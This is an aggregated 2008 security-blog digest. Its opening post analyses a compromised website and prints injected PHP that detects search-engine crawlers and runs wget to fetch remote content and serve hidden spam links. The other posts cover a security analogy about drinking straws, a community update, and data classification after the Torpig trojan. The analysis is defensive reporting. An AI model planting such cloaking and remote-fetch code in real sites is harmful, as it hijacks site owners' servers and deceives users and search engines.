A recent analysis of a compromised web site by eSoft's Threat Prevention Team lead to the discovery of hidden links designed only to show up when viewed by web crawlers such as those used by Google, Microsoft and Yahoo.

The website reviewed,, appears perfectly normal when viewed from standard browsers, but some PHP code has been injected that gives a long series of links designed to bump the PageRank of certain sites when viewed by a crawler.

The PHP code in question looks like this:


And resolves to this:

if ((eregi("bot", $_SERVER["HTTP_USER_AGENT"]) or eregi("urp", $_SERVER["HTTP_USER_AGENT"]) or eregi("msn", $_SERVER["HTTP_USER_AGENT"]))) {
system("wget -O /tmp/getincl.txt http://[redacted].com/temp/incl.txt");

When viewing the page with a user agent of googlebot, you get a lot of links that weren't there before. Here's a screenshot of one of the less offensive examples:

Picture 1.png

In other instances, a ton of porn links and text are displayed instead of the pharmaceutical links shown here.

This just proves the trends from open compromise to secret compromise. Most malware already tries to hide itself; web site defacements seem also to be a thing of the past as compromised sites are used more and more for relaying attacks and for more stealthy, income earning purposes.

Security, Drinking Straws, Cavities and Wrinkles... [Rational Survivability]

Posted: 11 Nov 2008 10:13 AM CST

StrawsI was reading an article on SlashFood titled "Drinking Straw: Friend or Foe" and chuckled at the parallels to the reflexive hyping, purchase and (oft failed) use of "solutions" in the security space.  Sometimes I think we need a

Recently, a friend passed along a tip from a dermatologist: Stop sipping through straws. The doctor said it was the number one cause of wrinkles.

Even more recently, at lunch one day my aunt relayed some info from her husband, an orthodontist. He said that drinking through a straw prevents cavities and tooth decay, since straws allow sugary beverages to bypass your teeth. When my aunt said this, everybody around the table (six women) stuck straws in their drinks.

But when I countered with the skincare side of the question, my aunt was the first to pluck her straw right back out again.

Brings new meaning to "security sucks."  What's your favorite "security straw" analogy?


Why We Hate the Insurance Industry [The Falcon's View]

Posted: 11 Nov 2008 09:58 AM CST

If you've ever heard people complain about their insurance provider, either for medical or dental or vision, but never quite understood why that might be, then I'm here to provide you an explanation. My wife recently had a crown made...

(SCC) Catalyst Community Update for November 12, 2008 [The Security Catalyst]

Posted: 11 Nov 2008 09:58 AM CST

It has been an interesting two weeks – thanks to a catastrophic failure on the bulk of my web servers – thanks to an unannounced dreamhost switch/migration that results in their setting all permissions incorrectly. It's a long and boring story – loaded with insights for anyone involved in technology and customer service. But we're fixed – and I'm back.

The last few weeks have been pretty amazing; we have traveled the country from Upstate, NY to Kansas City…. Seattle…. And then back "East" to Detroit. We leave here on Thursday and head to Ohio for two days before heading on to the DC Metro area. CompTIA is sponsoring a book signing and give-away at the CSI show – so look for more details.

Last week – before the blizzards closed down sections of I-90 — we stopped on Monday at Mount Rushmore – and the entire family was taken with the effort on multiple levels. I was drawn to the history of the presidents – and will be spending more time learning about the character of these men, and the way they served themselves and their country. All very inspiring!!

Join the conversation. Take responsibility. Make a difference!

Discussion Forum Activity

I have noticed an exciting trend in the community – more and more people are coming together to "create." The community is reaching another level (and I will be forming a team of volunteers to help improve the available tools) – and it is exciting to realize that by working together, we really can make a difference. Here are some recent discussions ripe for contribution or learning:

Here are three community-based efforts that you can contribute to, or learn from:

 Upcoming Opportunities to Work Together or Meet in Person:

List of community blogger and podcasters

(I am working to ensure the list is accurate and separate out the blogs from the podcasts — let me know if you need to be updated/included)

What Security Blogs and Podcasts are represented in this community? (

Here are some recent blog posts from Community Members that you may have missed:


About the Security Catalyst Community

 We are a positively focused and supportive community that unites passionate professionals to achieve three goals:

(1) Provide a community where it is acceptable to be vulnerable and ask for help when you need it

(2) Create a community where anyone with an idea can share their approach in the pursuit of helping another. If today is your first day in security, welcome - share what you have learned without fear.

(3) Participate in a forum where members can share their passions, expand their thinking and find support with others who believe in making a positive difference.

Signing Up for the Security Catalyst Community

Your participation is your currency (means no charge to join) - the more you contribute the more you learn and the more valuable the community becomes to everyone (so dive in and share).

Registration Overview (NOTE THE NAMING CONVENTION)

      Go here:

      Select the register link

      Follow the naming standard: firstname.lastname (include the period between first and last names)

      Your account will be reviewed and approved

      Jump in and share your thoughts!


Where is Michael - onTour Schedule & Updates

As we set out to journey the country, keep tabs on our schedule and opportunities to meet at or follow the progress of the book and speaking tour at As always, if you are on the way (or in the city we are heading), please contact me directly so we can meet. Our RV is our home, and our home is always open to our friends.

I am also spending more time on twitter these days - and would love to engage in the conversation with you. You can learn more about twitter here: and "follow" and chat with me here:

Coming Up:

Once the RV is repaired (working on it now) and our laptops restored (also in progress), we head right back out – and amazingly, don't really miss a beat!

  • Week of November 10: Southern Michigan (DC Metro) and Ohio
  • Week of November 17: DC Metro – CSI Conference (look for more details) and Philadelphia, PA for a private briefing for the CSO Breakfast Club
  • Week of November 24: Albany, NY – then Hershey, PA
  • Week of December 1: Trenton, NJ
  • Week of December 8: Baltimore/Metro DC

Join The Security Catalyst LinkedIn Group

For active members of the Security Catalyst Community

Data Discovery & Classification []

Posted: 11 Nov 2008 09:21 AM CST

I was reading the RSA report on the Torpig/Sinowal trojan while stuck at the airport for several hours last Thursday. During my many hours of free time I overheard some IT executive discussing the difficulties of implementing data discovery and classification with his peers. I did not catch the name of the company, and probably would not pass it along even if I had, but the tired and whiny rant about their associated failures was not unique. Perhaps I was a bit testy about having to sit in an airport lobby for eight hours, but all I could think was “What is wrong with you? If hackers can navigate your data center, why can’t you?”

That’s where the RSA report just gelled my thoughts on the subject. If a small group, quite literally a handful of hackers, can use Torpig & BlaBla to steal hundreds of thousands of credit card numbers, steal accounts and passwords, install malicious software at multiple company sites … all without being provided credentials, access rights or a specific map of your IT infrastructure … why can’t your company classify its own data and intellectual property assets? You would think that a company, given a modest amount of resources, could discover, classify and categorize its own data. I mean, if you paid someone full time to do it, don’t you think you could get the job done?

Some of the irritating points that they raised …

“Data in motion made it difficult to track”: So what- the hacker tools are kept running and they never stopped scanning. Nor did they give up on the first try; rather they periodically modified their code to adapt for location and type of data, and they were persistent. You should be too.

“Difficulty to classify the data” and “Can’t find stuff you know is there”: So what- hire better programmers. Pressure vendors for better tools. Can’t afford expensive software? There is open source code out there to start with; hackers can do it- so can you. There are at least a dozen programmatic ways to analyze data, through content or even context, and probably even more ways to traverse/crawl/inspect systems. If the application your company uses can find it, so can you.

“Size of the project is difficult to manage”: So what- divide and conquer. Take a specific set of data you are worried about and start there. Compliance group breathing down your neck to meet XYZ regulation? Pick one category (customer accounts, credit card data, source code, whatever. Tune your tools and policies (you didn’t really think you were going to get perfection out of the box, did you?), address that problem, and move on. If you are starting with an ISACA or Cobit framework and trying to map a comprehensive strategy, stop making the problem more complex than it is. Hackers went for low hanging fruit- you should too.

“The results are not accurate”: So what- you’re not going to be 100% right all the time. The hackers aren’t either. Either accept 95-99% accuracy, or try something different. Or maybe your policy is out of line with reality and needs to be reconsidered.

“Expensive” and “Takes too much in the way of resources”: No chance! If hackers can run malware for 18 months at TJX and related stores UNDETECTED, then the methods used are not resource hogs, nor did they invest that much money in the tools.

Sometimes you’ve just got to stop whinin’ and git ‘er done!


1 comment:

wander said...

For information on how to prevent back pain, please visit: